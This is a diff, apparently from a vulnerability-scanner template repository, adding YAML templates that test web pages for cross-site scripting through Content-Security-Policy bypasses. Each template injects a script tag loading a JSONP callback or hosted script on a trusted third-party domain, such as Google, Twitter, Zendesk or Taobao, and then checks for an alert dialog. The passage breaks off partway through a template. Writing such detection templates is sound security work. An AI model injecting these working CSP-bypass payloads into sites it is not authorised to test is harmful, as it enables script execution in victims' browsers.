+++ b/dast/vulnerabilities/xss/csp/storage-googleapis-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: storage-googleapis-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google Storage
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,google
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://storage.googleapis.com/bypass_csp/xss.js"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: storage_googleapis_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "storage_googleapis_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/storemapper-herokuapp-fastly-csp-xss.yaml b/dast/vulnerabilities/xss/csp/storemapper-herokuapp-fastly-csp-xss.yaml
new file mode 100644
index 00000000000..32994ba3d9c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/storemapper-herokuapp-fastly-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: storemapper-herokuapp-fastly-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Storemapper Herokuapp Fastly
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,storemapper
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://storemapper-herokuapp-com.global.ssl.fastly.net/api/users/9223/stores.js?callback=alert(1)-"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: storemapper_herokuapp_fastly_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "storemapper_herokuapp_fastly_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/suggest-taobao-csp-xss.yaml b/dast/vulnerabilities/xss/csp/suggest-taobao-csp-xss.yaml
new file mode 100644
index 00000000000..cf1e7e98928
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/suggest-taobao-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: suggest-taobao-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Taobao Suggest
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,taobao
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://suggest.taobao.com/sug?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: suggest_taobao_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "suggest_taobao_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/suggestqueries-youtube-csp-xss.yaml b/dast/vulnerabilities/xss/csp/suggestqueries-youtube-csp-xss.yaml
new file mode 100644
index 00000000000..fa2828d7c4e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/suggestqueries-youtube-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: suggestqueries-youtube-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via YouTube SuggestQueries
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,youtube
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://suggestqueries-clients6.youtube.com/complete/search?client=youtube&q=$query&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: suggestqueries_youtube_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "suggestqueries_youtube_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/support-zendesk-csp-xss.yaml b/dast/vulnerabilities/xss/csp/support-zendesk-csp-xss.yaml
new file mode 100644
index 00000000000..6e2c9946b9a
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/support-zendesk-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: support-zendesk-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Zendesk Support
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,zendesk
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://support.zendesk.com/accounts/reminder?callback=alert(window.location)//"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: support_zendesk_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "support_zendesk_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/swiftype-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/swiftype-api-csp-xss.yaml
new file mode 100644
index 00000000000..85452b5d1d9
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/swiftype-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: swiftype-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Swiftype API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,swiftype
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.swiftype.com/api/v1/public/engines/search.json?callback=alert&engine_key=JDuYRnCLSDZzYWgBkoSB"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: swiftype_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "swiftype_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/sync-im-apps-csp-xss.yaml b/dast/vulnerabilities/xss/csp/sync-im-apps-csp-xss.yaml
new file mode 100644
index 00000000000..9d3615ae106
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/sync-im-apps-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: sync-im-apps-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via IM Apps Sync
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,im-apps
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://sync.im-apps.net/imid/segment?callback=alert(1)&token=VXoW9wEaCAYxiIkb8Mzm7Q"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: sync_im_apps_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "sync_im_apps_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/tagmanager-google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/tagmanager-google-csp-xss.yaml
new file mode 100644
index 00000000000..60413f9387e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/tagmanager-google-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: tagmanager-google-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google Tag Manager
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,google
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://tagmanager.google.com/debug/api/vtinfo?gtm_auth=a-0uanYFkML7e3v7Vmxpwg&env_id=env-8&public_id=GTM-TWMCBFD&templates=&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: tagmanager_google_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "tagmanager_google_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/tcr9i-openai-csp-xss.yaml b/dast/vulnerabilities/xss/csp/tcr9i-openai-csp-xss.yaml
new file mode 100644
index 00000000000..1cd217b9730
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/tcr9i-openai-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: tcr9i-openai-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via OpenAI TCR9I
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,openai
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://tcr9i.openai.com/fc/a/?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: tcr9i_openai_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "tcr9i_openai_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/thehive-shopify-csp-xss.yaml b/dast/vulnerabilities/xss/csp/thehive-shopify-csp-xss.yaml
new file mode 100644
index 00000000000..7b8db0afe94
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/thehive-shopify-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: thehive-shopify-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Shopify TheHive
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,shopify
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://thehive.shopify.io/scripts/vendor.78eed977.js"></script><div ng-app><img src=x ng-on-error="window=$event.target.ownerDocument.defaultView;window.alert(window.origin);">'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: thehive_shopify_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "thehive_shopify_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/thiscanbeanything-zendesk-csp-xss.yaml b/dast/vulnerabilities/xss/csp/thiscanbeanything-zendesk-csp-xss.yaml
new file mode 100644
index 00000000000..41371386464
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/thiscanbeanything-zendesk-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: thiscanbeanything-zendesk-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Zendesk ThisCanBeAnything
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,zendesk
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://thiscanbeanything.zendesk.com/sc/faye/?message=[{%22channel%22:%22%22}]&jsonp=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: thiscanbeanything_zendesk_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "thiscanbeanything_zendesk_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml b/dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml
index 639b8af052c..762cd7ef3e9 100644
--- a/dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml
+++ b/dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml
@@ -2,10 +2,10 @@ id: tiktok-analytics-csp-xss
 
 info:
   name: Content-Security-Policy Bypass via TikTok Analytics
-  author: DhiyaneshDK
-  severity: high
+  author: renniepak,DhiyaneshDK
+  severity: medium
   reference:
-    - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L11C22-L11C115
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
   metadata:
     verified: true
   tags: xss,csp-bypass,tiktok
@@ -33,15 +33,23 @@ http:
         part: body
         words:
           - "{{injection}}"
+        internal: true
 
-      - type: word
-        part: content_type
-        words:
-          - "text/html"
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
 
-      - type: word
-        part: content_security_policy
-        words:
-          - "analytics.tiktok.com"
-          - "script-src"
-        condition: and
\ No newline at end of file
+      - action: waitload
+
+      - action: waitdialog
+        name: tiktok_analytics_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "tiktok_analytics_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/translate-google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/translate-google-csp-xss.yaml
new file mode 100644
index 00000000000..ac99d5c7d23
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/translate-google-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: translate-google-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google Translate
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,google
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://translate.google.com/translate_a/element.js?cb=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: translate_google_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "translate_google_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/translate-googleapis-csp-xss.yaml b/dast/vulnerabilities/xss/csp/translate-googleapis-csp-xss.yaml
new file mode 100644
index 00000000000..d4ba9d4fe9b
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/translate-googleapis-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: translate-googleapis-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google Translate API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,google
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://translate.googleapis.com/$discovery/rest?version=v3&callback=alert();"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: translate_googleapis_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "translate_googleapis_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/translate-yandex-csp-xss.yaml b/dast/vulnerabilities/xss/csp/translate-yandex-csp-xss.yaml
new file mode 100644
index 00000000000..881620169ca
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/translate-yandex-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: translate-yandex-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Yandex Translate
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,yandex
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: translate_yandex_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "translate_yandex_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/tumblr-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/tumblr-api-csp-xss.yaml
new file mode 100644
index 00000000000..f0df4772dde
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/tumblr-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: tumblr-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Tumblr API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,tumblr
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.tumblr.com/v2/blog/zoeappleseed.tumblr.com/posts/photo?tag=seed&offset=0&api_key=msIByDvkVk3gSr360nq2vmTkKIAvW4gNTB2dUYkvIO9NLwyxNy&jsonp=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: tumblr_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "tumblr_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/twitter-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/twitter-api-csp-xss.yaml
new file mode 100644
index 00000000000..baa6e590235
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/twitter-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: twitter-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Twitter API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,twitter
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.twitter.com/1/statuses/oembed.json?url=https:%2F%2Ftwitter.com%2FMartina%2Fstatus%2F867710263654580226&callback=alert&_=1496363308445"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: twitter_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "twitter_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/twitter-csp-xss.yaml b/dast/vulnerabilities/xss/csp/twitter-csp-xss.yaml
new file mode 100644
index 00000000000..fdfb51dce12
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/twitter-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: twitter-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Twitter
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,twitter
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://platform.twitter.com/widgets.js?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: twitter_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "twitter_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/udgnoz7mccyaowzp-public-blob-vercel-storage-csp-xss.yaml b/dast/vulnerabilities/xss/csp/udgnoz7mccyaowzp-public-blob-vercel-storage-csp-xss.yaml
new file mode 100644
index 00000000000..5ae7610a7bb
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/udgnoz7mccyaowzp-public-blob-vercel-storage-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: udgnoz7mccyaowzp-public-blob-vercel-storage-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Vercel Storage
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,vercel
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://udgnoz7mccyaowzp.public.blob.vercel-storage.com/a-LAZhjxXucrzBiROqCt4bsY3n6srlWP.js"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: udgnoz7mccyaowzp_public_blob_vercel_storage_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "udgnoz7mccyaowzp_public_blob_vercel_storage_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/ug-alibaba-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ug-alibaba-csp-xss.yaml
new file mode 100644
index 00000000000..93d14b06a8d
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/ug-alibaba-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: ug-alibaba-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Alibaba
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,alibaba
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://ug.alibaba.com/api/ship/read?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: ug_alibaba_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "ug_alibaba_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/uk-indeed-csp-xss.yaml b/dast/vulnerabilities/xss/csp/uk-indeed-csp-xss.yaml
new file mode 100644
index 00000000000..2f34a9f6cfb
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/uk-indeed-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: uk-indeed-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Indeed UK
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
